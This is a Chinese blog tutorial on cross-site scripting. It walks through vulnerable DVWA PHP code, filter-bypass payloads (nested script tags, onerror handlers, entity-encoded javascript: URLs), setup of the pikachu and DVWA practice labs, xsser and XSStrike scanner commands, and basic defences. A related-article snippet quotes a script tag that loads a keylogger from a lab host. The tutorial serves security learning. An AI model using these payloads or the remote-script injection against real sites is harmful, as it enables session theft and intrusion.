XSS渗透与防御——(二)XSS

最新推荐文章于 2024-03-18 09:44:00 发布
最新推荐文章于 2024-03-18 09:44:00 发布
阅读量281 收藏 1
点赞数
分类专栏: # XSS 文章标签: xss web安全 php
本文博主FisrtBqy。文章内容仅供学习交流,未经允许请勿用于论文写作、竞赛答辩、书刊出版、商业活动等。如有问题请联系作者:[email protected]
本文链接:https://blog.csdn.net/FisrtBqy/article/details/123414923
版权

第二章 XSS

1 XSS(Cross Site Script)基础和分类

恶意攻击者利用web页面的漏洞,插入一些恶意代码,当用户访问页面时,代码就会执行,即为达到攻击目的。

1.1 反射型XSS

在这里插入图片描述

  • 比如在如下网页源码中

    <?php                                                                 //1.
header ("X-XSS-Protection: 0");                                       //2.
// Is there any input?                                                //3.
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {  //4.
 // Feedback for end user                                          //5.
 echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';                  //6.
}                                                                     //7.
?>                                                                    //8.

​ 第6行将用户输入**(可能是用户名,也可能是留言)**未经处理直接输出显示,如果用户输入<script>alert('XSS');</script>,则会发生

在这里插入图片描述

  • 当然源码可能将<script>标签 过滤

    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    那么在输入时使用大写<Script>或者复写<scri<script>pt>

  • 也可能将大小写都屏蔽了:

    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    那么就要换一个标签,比如:

    <img src="" onerror="alert('XSS')">

    <audio src="" onerror="alert('XSS')">

    <video src="" onerror="alert('XSS')">

  • 也可能使用了htmlspecialchars函数来转义字符$name = htmlspecialchars( $_GET[ 'name' ] );

在这里插入图片描述
那么就需要构造脚本来注入

 a' οnclick='alert(1)'
 a' οnfοcus='alert(1)'
 javascript:alert(1)
 或者转义,如上一条可转义为: &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

1.2 存储型XSS

在这里插入图片描述

  • 比如在如下网页源码中

    <?php                                                                            //1.
if( isset( $_POST[ 'btnSign' ] ) ) {                                             //2.
    // Get input                                                                 //3.
    $message = trim( $_POST[ 'mtxMessage' ] );                                   //4.
    $name    = trim( $_POST[ 'txtName' ] );                                      //5.
    // Sanitize message input                                                    //6.
    $message = stripslashes( $message );                                         //7.
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));                                                      //8.
    // Sanitize name input                                                       //9.
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));                                                      //10.
    // Update database                                                           //11.
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";                                                                             //12.
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );                                                                                    //13.
    //mysql_close();                                                             //14.
}                                                                                //15.
?>                                                                               //16.

​ 第8行对用户输入未经处理就显示出来,如果用户输入<script>alert('XSS');</script>,则会产生与上文讲到的反射型XSS同样的结果。

在这里插入图片描述

  • 同样的,可能将<script>标签过滤了、将大小写屏蔽、转义字符等。

2 pikachu和DVWA靶场搭建

2.1 pikachu

pikachu 是一款开源的练习 web 漏洞的综合靶场,用 PHP 代码 编写而成。需要 PHP 和 Nginx(中间件)环境运行。

2.1.1 下载

GitHub下载地址

由于近来GitHub访问速度屡刷新低,经常无法打开,所以我给出国内可以快速访问的地址:

Gitee下载地址

2.1.2 安装

最简单的方法,就是先安装phpStudy,然后把pikachu解压放在phpstudy安装目录的WWW路径下,安装好MySql和Nginx,新建网站指定到pikachu目录即可。

  1. 安装phpstudy 在这里插入图片描述

  2. 新建网站

    在这里插入图片描述

  3. 修改pikachu配置文件,用于初始化数据库

    修改配置文件WWW\pikachu\WWW\inc\config.inc.php
    在这里插入图片描述
    根据注解修改即可

    在这里插入图片描述

    打开网址+端口号,单击安装/初始化,等待完毕后即可使用。

  4. XSS后台

    需要先将配置文件修改后才可使用

    WWW\pikachu\pkxss\inc\config.inc.php
    在这里插入图片描述

2.2 DVWA

DVWA 是一款开源的练习 web 漏洞的靶场工具,用 PHP 代码编 写而成。需要 PHP 和 Apache 环境运行。

2.2.1 下载

网页下载

GitHub下载地址

Gitee下载地址

2.2.2 安装

把DVWA解压后放在phpstudy的WWW路径下,后续操作与pikachu安装相同,注意这里配置文件需要自己先修改后缀名。

在这里插入图片描述

默认用户名密码为admin/password

2.3 其他XSS平台

https://github.com/78778443/xssplatform

Kali中命令行输入beef-xss,默认用户名密码是beef/123456

3 XSS检测和利用

3.1 XSSER

地址:https://xsser.03c8.net

Kali中命令行输入xsser即可安装使用

xsser -u url --cookie=COOKIE

xsser -De "google" -d "search.php?q="

3.2 XSSTRIKE

git clone https://github.com/s0md3v/XSStrike

Gitee下载地址

检测命令:

#Get类型
python3 xsstrike.py -u 'url'
#POST类型
python3 xsstrike.py -u 'url' --data 'name=1'

4 XSS防御

其根本就是通过正则表达式等来识别并过滤XSS脚本

  • 入口:正则识别关键字并处理,替换成别的字符

  • 出口:htmlspecialchars函数实体化字符

  • WAF 防火墙

    Github下载

    Gitee下载

  • mod_security需要配合Apache使用

FisrtBqy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xsser漏洞工具安装
qq_34835587的博客
10-19 4782
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
XSSer(超强XSS攻击利器)使用说明中文版
热门推荐
要不,单步调试走起?
10-15 2万+
转自 xxx.com ======================================================================= BackTrack 5 R1 XSS研究之XSSer(超强XSS攻击利器)使用说明中文版                                                     XSSer使用说明
XSS渗透防御——(三)XSSER语法
FisrtBqy的博客
03-24 1376
第三章 XSSER语法 Usage: xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]` [Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [T
XSSER:一款强大而灵活的XSS攻击工具
最新发布
gitblog_00030的博客
03-18 464
XSSER:一款强大而灵活的XSS攻击工具 XSSER 是一个功能强大的自动化跨站脚本(XSS)攻击工具,旨在帮助网络安全研究人员、渗透测试人员和开发人员发现并利用XSS漏洞。 XSSER的特点与功能 自动化:XSSER能够自动扫描目标网站上的XSS漏洞,并生成相应的payload进行验证。 灵活定制:支持自定义多种参数,如HTTP方法、请求头、payload等,以满足不同场景的需求。 多种攻击...
kali上的xsser安装教程
2302_76986722的博客
09-10 720
XSSer是一款用于测试和利用跨站脚本漏洞(XSS)的工具。
XSSer使用
Skanda
01-18 1万+
   XSSer,开源渗透测试工具,由python开发,本人使用ubuntu 10。04系统。因为ChenZhiDe 老师要求毕业设计中要使用多种渗透测试工具,在sourceforge  上找了好一段时间,才找到这款。。。安装:下载:http://sourceforge.net/projects/xsser/files/xsser-1.0.tar.gz/download,解压缩后终端进入xsser-public目录。    XSSery语法:    ./XSSer.py [OPTIONS] [-u |-i
Web安全XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
8、XSS 攻击的防御pdf资料
10-15
8、XSS 攻击的防御
xsser工具使用教程
分享学习网络的点点滴滴
08-23 1382
Phpids 基于PHP的框架0.6.5的注入。–Xsr 对http头referer进行注入。–Anchor 使用anchor状态注入。–lnd 对http响应发现注入点。–Xsa 向agent进行注入。–Doo --对ip地址编码。–Dcp 对数据控制协议注入。–Dom 对DOM进行注入。–Dos 对客户端拒绝服务注入。–Doss 拒绝服务注入。–Cem=CEM 进行多种编码。
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3501
文章目录简介:用法:(一)、Options:()、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
第十三章—手动漏洞挖掘(十)——XSS
weixin_43876557的博客
04-07 344
XSS) 1.场景:键盘记录器 1.1 环境准备 #要执行的指令,10.0.0.140是kail这台虚机的ip,我们需要在该虚机上新建一个keylogger.js脚本文件 <script src="http://10.0.0.140/keylogger.js"></script> #因为我们要把keylogger.js文件放到apache下,所以在创建keylogger.js脚本文件前,我们需要查询80端口是否被占用 netstat -pantu | gerp :80 #如果查
XSS学习实践全过程!
jklbnm12的博客
09-16 3609
一:什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是:恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 :简单的工具
SQL 登录注入脚本_常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御...
weixin_39774491的博客
11-20 229
1.SQL注入原理:1).SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字元为不同命 令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。(但连续2个单引 号字元,在SQL资料库中,则视为字串中的一个单引号字元)3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查...
nginx配置解决XSS漏洞问题
wangjian20000的专栏
03-01 7772
打开nginx.conf文件,找到对应的location模块, X-XSS-Protection 的字段有三个可选配置值,说明如下: 0: 表示关闭浏览器的XSS防护机制1:删除检测到的恶意代码, 如果响应报文中没有看到X-XSS-Protection 字段,那么浏览器就认为X-XSS-Protection配置为1,这是浏览器的默认设置1; mode=block:如果检测到恶意代码,在不渲染恶意代码 location模块新增如下配置信息, location / { add_header X-Con
Nginx实现XSS、SQL注入防护 —— 筑梦之路
筑梦之路
06-21 1357
将下面的 配置文件代码放入到对应站点的 配置文件 里,然后重启 即可生效
关于nginx配置项防止xss攻击的记录
蓝色的天空的博客
04-03 6058
server { ...... //以下两种方式未生效 add_header Content-Security-Policy "default-src 'self' localhost:80 'unsafe-inline' 'unsafe-eval' blob: data: ;"; add_header X-XSS-Protection "1; mode=block"; location / { ......
xss漏洞的危害与防御
05-30
XSS(Cross-site scripting)漏洞是一种常见的Web安全漏洞,攻击者通过在Web页面中注入恶意脚本,...5. 使用框架和库:使用流行的Web框架和库,可以减少XSS攻击的风险,因为这些框架和库已经实现了一些XSS防御机制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值